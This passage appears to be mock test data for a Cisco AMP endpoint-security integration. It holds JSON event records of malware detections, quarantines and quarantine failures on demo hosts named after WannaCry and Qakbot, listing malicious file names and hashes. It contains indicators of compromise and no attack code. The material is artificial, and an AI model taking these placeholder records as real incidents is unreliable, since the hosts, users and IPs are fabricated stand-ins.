IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. 
It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective 
Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
